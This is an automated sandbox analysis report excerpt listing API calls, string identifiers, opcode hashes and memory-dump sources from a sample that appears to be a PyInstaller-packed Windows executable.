                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 1239891234-0
                                                                                                    • Opcode ID: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
                                                                                                    • Instruction ID: e920b468abaa2f5667e041e237593994bace65629b1ef3784732e8ff6be79b8f
                                                                                                    • Opcode Fuzzy Hash: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
                                                                                                    • Instruction Fuzzy Hash: 90315D36608B81C6DB649F25F8502AEB3B4FB88758FA40135EA9D43B69DF3CD545CB10
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 2227656907-0
                                                                                                    • Opcode ID: 88c6eeb3815b689bec9e785de6a4435637107cd6a4a104e99c849aa3a7604df1
                                                                                                    • Instruction ID: 387862141facbb0876d268417b8c75bedefae21d284d01052ae087f4493ecac2
                                                                                                    • Opcode Fuzzy Hash: 88c6eeb3815b689bec9e785de6a4435637107cd6a4a104e99c849aa3a7604df1
                                                                                                    • Instruction Fuzzy Hash: C8B1C7A1B18692C1EE68AF25F5101B9E3B1EB54BE4FA45131EA5D07B89DF3CE441CB10
                                                                                                    APIs
                                                                                                    • _get_daylight.LIBCMT ref: 00007FF7691C51BA
                                                                                                      • Part of subcall function 00007FF7691C4908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7691C491C
                                                                                                    • _get_daylight.LIBCMT ref: 00007FF7691C51CB
                                                                                                      • Part of subcall function 00007FF7691C48A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7691C48BC
                                                                                                    • _get_daylight.LIBCMT ref: 00007FF7691C51DC
                                                                                                      • Part of subcall function 00007FF7691C48D8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7691C48EC
                                                                                                      • Part of subcall function 00007FF7691B9C58: HeapFree.KERNEL32(?,?,?,00007FF7691C2032,?,?,?,00007FF7691C206F,?,?,00000000,00007FF7691C2535,?,?,?,00007FF7691C2467), ref: 00007FF7691B9C6E
                                                                                                      • Part of subcall function 00007FF7691B9C58: GetLastError.KERNEL32(?,?,?,00007FF7691C2032,?,?,?,00007FF7691C206F,?,?,00000000,00007FF7691C2535,?,?,?,00007FF7691C2467), ref: 00007FF7691B9C78
                                                                                                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7691C541C), ref: 00007FF7691C5203
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                    • String ID:
                                                                                                    • API String ID: 3458911817-0
                                                                                                    • Opcode ID: c5508bc63ced89b7e96ce891f343e42cb1356f84bc391250f2f4d752248c7e40
                                                                                                    • Instruction ID: 9cf476a06e87a2b76ccd705b8f9ed2ce0ab6b908321376459e1b72f4370a8772
                                                                                                    • Opcode Fuzzy Hash: c5508bc63ced89b7e96ce891f343e42cb1356f84bc391250f2f4d752248c7e40
                                                                                                    • Instruction Fuzzy Hash: 76514B32A1C642C6E728FF21F8915A9E7B0BB48784FE45135EA4D87696DF3CE441CB60
                                                                                                    APIs
                                                                                                    • GetProcAddress.KERNEL32(?,00007FF7691A5C57,?,00007FF7691A308E), ref: 00007FF7691A50C0
                                                                                                    • GetProcAddress.KERNEL32(?,00007FF7691A5C57,?,00007FF7691A308E), ref: 00007FF7691A5101
                                                                                                    • GetProcAddress.KERNEL32(?,00007FF7691A5C57,?,00007FF7691A308E), ref: 00007FF7691A5126
                                                                                                    • GetProcAddress.KERNEL32(?,00007FF7691A5C57,?,00007FF7691A308E), ref: 00007FF7691A514B
                                                                                                    • GetProcAddress.KERNEL32(?,00007FF7691A5C57,?,00007FF7691A308E), ref: 00007FF7691A5173
                                                                                                    • GetProcAddress.KERNEL32(?,00007FF7691A5C57,?,00007FF7691A308E), ref: 00007FF7691A519B
                                                                                                    • GetProcAddress.KERNEL32(?,00007FF7691A5C57,?,00007FF7691A308E), ref: 00007FF7691A51C3
                                                                                                    • GetProcAddress.KERNEL32(?,00007FF7691A5C57,?,00007FF7691A308E), ref: 00007FF7691A51EB
                                                                                                    • GetProcAddress.KERNEL32(?,00007FF7691A5C57,?,00007FF7691A308E), ref: 00007FF7691A5213
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc
                                                                                                    • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                    • API String ID: 190572456-2007157414
                                                                                                    • Opcode ID: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
                                                                                                    • Instruction ID: b977056ebd8f976bdca1b9f7a3876c64bf4bdb26c63be015a12d340282d95314
                                                                                                    • Opcode Fuzzy Hash: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
                                                                                                    • Instruction Fuzzy Hash: 1112A2A4A4EB03D1FA1DFF15B9101B8A3B0AF19751BF41835D80E527A0EF3CB95AC661
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc
                                                                                                    • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                    • API String ID: 190572456-3427451314
                                                                                                    • Opcode ID: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
                                                                                                    • Instruction ID: 69b9493a80f2cb657946bd6893dc7617ff764f2252706a07d89c38df2c437110
                                                                                                    • Opcode Fuzzy Hash: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
                                                                                                    • Instruction Fuzzy Hash: 6FE1AF68A8DB07D1FA1DFF19B9501B8E3B5AF14791FF41036C81E026A4EF3CA959C621
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Name::operator+
                                                                                                    • String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $auto$bool$char$char16_t$char32_t$char8_t$const$decltype(auto)$double$float$int$long$long $short$signed $unsigned $void$volatile$wchar_t
                                                                                                    • API String ID: 2943138195-1388207849
                                                                                                    • Opcode ID: 34b20832b4d5a9c82cdd9a34609b0a596913eac70dfc3082442192f721d64891
                                                                                                    • Instruction ID: adb1d51ea4d471613a155b1a50220207a4ac2e5f6f544f9787335b38b441d6a9
                                                                                                    • Opcode Fuzzy Hash: 34b20832b4d5a9c82cdd9a34609b0a596913eac70dfc3082442192f721d64891
                                                                                                    • Instruction Fuzzy Hash: 23F190B2F18E128CF7148B66C9542BC2BB0BB24364F4045B5DA2D76AB9DF7DE644C348
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Name::operator+
                                                                                                    • String ID: `anonymous namespace'
                                                                                                    • API String ID: 2943138195-3062148218
                                                                                                    • Opcode ID: c36001f134547c1fc12f70ffa9b86d35a9d04869d0c52a2f257cd9dd74f3dfc9
                                                                                                    • Instruction ID: 44e96f0025a63af91bf83fe82440d8e47277946b5aa61e753f382b76e633f7fe
                                                                                                    • Opcode Fuzzy Hash: c36001f134547c1fc12f70ffa9b86d35a9d04869d0c52a2f257cd9dd74f3dfc9
                                                                                                    • Instruction Fuzzy Hash: 65E1BD72A08F829DEB11CF66D4801AD77A0FB64764F4040B5EB6D2BBA6DF38E554C704
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message
                                                                                                    • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                    • API String ID: 2030045667-1550345328
                                                                                                    • Opcode ID: d70d77859ce4cd26aee71117bdc994a99ad33a2fc884273708e58e418250d0be
                                                                                                    • Instruction ID: 00c4444d75a7bfdf61dccc0a815bbe355591a298c757a8cc661feb79e62edf0a
                                                                                                    • Opcode Fuzzy Hash: d70d77859ce4cd26aee71117bdc994a99ad33a2fc884273708e58e418250d0be
                                                                                                    • Instruction Fuzzy Hash: 4E519A61B08642D2EA18BF61B9001B9A3B0BF44B94FE44131EE1D87FD5EE3CE955C720
                                                                                                    APIs
                                                                                                      • Part of subcall function 00007FF7691A86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7691A3FA4,00000000,00007FF7691A1925), ref: 00007FF7691A86E9
                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(?,00007FF7691A7C97,?,?,FFFFFFFF,00007FF7691A3834), ref: 00007FF7691A782C
                                                                                                      • Part of subcall function 00007FF7691A26C0: MessageBoxW.USER32 ref: 00007FF7691A2736
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                    • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                    • API String ID: 1662231829-930877121
                                                                                                    • Opcode ID: 5adf1a7b4f365c991e592d6daa758356e56cb82b092043d5b28c068608273831
                                                                                                    • Instruction ID: 3ec37d6ba19b5a3505ac5e70bc2439cd57e8d762e2278291e358dffc35c70231
                                                                                                    • Opcode Fuzzy Hash: 5adf1a7b4f365c991e592d6daa758356e56cb82b092043d5b28c068608273831
                                                                                                    • Instruction Fuzzy Hash: BB419711F1D643C1FA59BF25F8516B9E271AF44790FE44433D64E82E99EE2CE904C760
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Name::operator+
                                                                                                    • String ID:
                                                                                                    • API String ID: 2943138195-0
                                                                                                    • Opcode ID: 63ad456de8db332c0b347e2e514b887ab112aaee213ccda8367cb7f767930e9c
                                                                                                    • Instruction ID: b0e19649e05d6378c33ba4604b14863f2ee39d1620a57cacc7a5842a360d4acd
                                                                                                    • Opcode Fuzzy Hash: 63ad456de8db332c0b347e2e514b887ab112aaee213ccda8367cb7f767930e9c
                                                                                                    • Instruction Fuzzy Hash: BCF18D72B08A829EF711DF66E4901EC37B0EB2435CB4041B5EE6D67AA5DF38D906C348
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Name::operator+
                                                                                                    • String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-$nullptr
                                                                                                    • API String ID: 2943138195-2309034085
                                                                                                    • Opcode ID: 767f6b35ed257beddb1ea2fff1390adae3ecab9bc22a75a6672164d643aa4b64
                                                                                                    • Instruction ID: b2308a5b933c921f35a3c5f6642ebc039545b17a461f419400a242fac59adb50
                                                                                                    • Opcode Fuzzy Hash: 767f6b35ed257beddb1ea2fff1390adae3ecab9bc22a75a6672164d643aa4b64
                                                                                                    • Instruction Fuzzy Hash: 7FE1A172E08E028CFB14AB6AD9581BC27E4AF65764F4401B5DE2D36AB9DF3CA544C348
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Frame$BlockEstablisherHandler3::Unwindabortterminate$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                    • String ID: csm$csm$csm
                                                                                                    • API String ID: 3436797354-393685449
                                                                                                    • Opcode ID: d5e0e3ab29c15918133307a59fdea49d8ed4f7431b693d67295d57de9f2acebd
                                                                                                    • Instruction ID: 9f322ceca1445c18d436cd4cfd1ab5055cbc19680d3decd3b1844b37a1ef08d9
                                                                                                    • Opcode Fuzzy Hash: d5e0e3ab29c15918133307a59fdea49d8ed4f7431b693d67295d57de9f2acebd
                                                                                                    • Instruction Fuzzy Hash: 48D17432A08F418EEB54DF66D4402AE77A0FB65BA8F100175EE9D67B65CF38E494C704
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718792288.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718771841.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718819453.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718843961.00007FF7691E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718881280.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ff7691a0000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                    • String ID: P%
                                                                                                    • API String ID: 2147705588-2959514604
                                                                                                    • Opcode ID: 028f263e58f42d33d872b22938efc015f71aa7b4c996476cfe5add7d8b08dd36
                                                                                                    • Instruction ID: 76a5a1673db0565395af148334a9a4b4b0236263a3ba342845590c5ce42888af
                                                                                                    • Opcode Fuzzy Hash: 028f263e58f42d33d872b22938efc015f71aa7b4c996476cfe5add7d8b08dd36
                                                                                                    • Instruction Fuzzy Hash: 6D51E7266087A1C6D6389F26B4181BAF7B1F798B62F504121EBDF83684DF3CD045DB20
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: `generic-type-$`template-parameter-$generic-type-$template-parameter-
                                                                                                    • API String ID: 0-3207858774
                                                                                                    • Opcode ID: 6f458657f8fae6e2f2557f40169539ea56a3e6fb73d2116d9b83691f1491e61c
                                                                                                    • Instruction ID: 606cf050714bde27de9d5f03bf3cfc5ab7bce46f87510240db048384b56ec545
                                                                                                    • Opcode Fuzzy Hash: 6f458657f8fae6e2f2557f40169539ea56a3e6fb73d2116d9b83691f1491e61c
                                                                                                    • Instruction Fuzzy Hash: 3B91AB32B08E868DFB108B62D4502BC77A0AB64B64F4845B2DE6D233B6DF3CE545D318
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Name::operator+$Name::operator+=
                                                                                                    • String ID: `unknown ecsu'$class $coclass $cointerface $enum $struct $union
                                                                                                    • API String ID: 179159573-1464470183
                                                                                                    • Opcode ID: 2fc61dd6c602e97fa3c1e55ca06bd20aebc659b0b394667bc2b1a0081ee2f141
                                                                                                    • Instruction ID: afda46302a8321e602c1bcaa81b4c441be55a1a556662d9b258ce46c3c70d297
                                                                                                    • Opcode Fuzzy Hash: 2fc61dd6c602e97fa3c1e55ca06bd20aebc659b0b394667bc2b1a0081ee2f141
                                                                                                    • Instruction Fuzzy Hash: 9D517A31E18E26CDFB14CBA6E8405BC33B4BB243A4F500275DE2D76A69DF29E552C704
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.1718925987.00007FFE13301000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.1718901593.00007FFE13300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718946641.00007FFE13311000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718966930.00007FFE13316000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                    • Associated: 00000001.00000002.1718983953.00007FFE13317000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7ffe13300000_VaTlw2kNGc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Name::operator+
                                                                                                    • String ID:
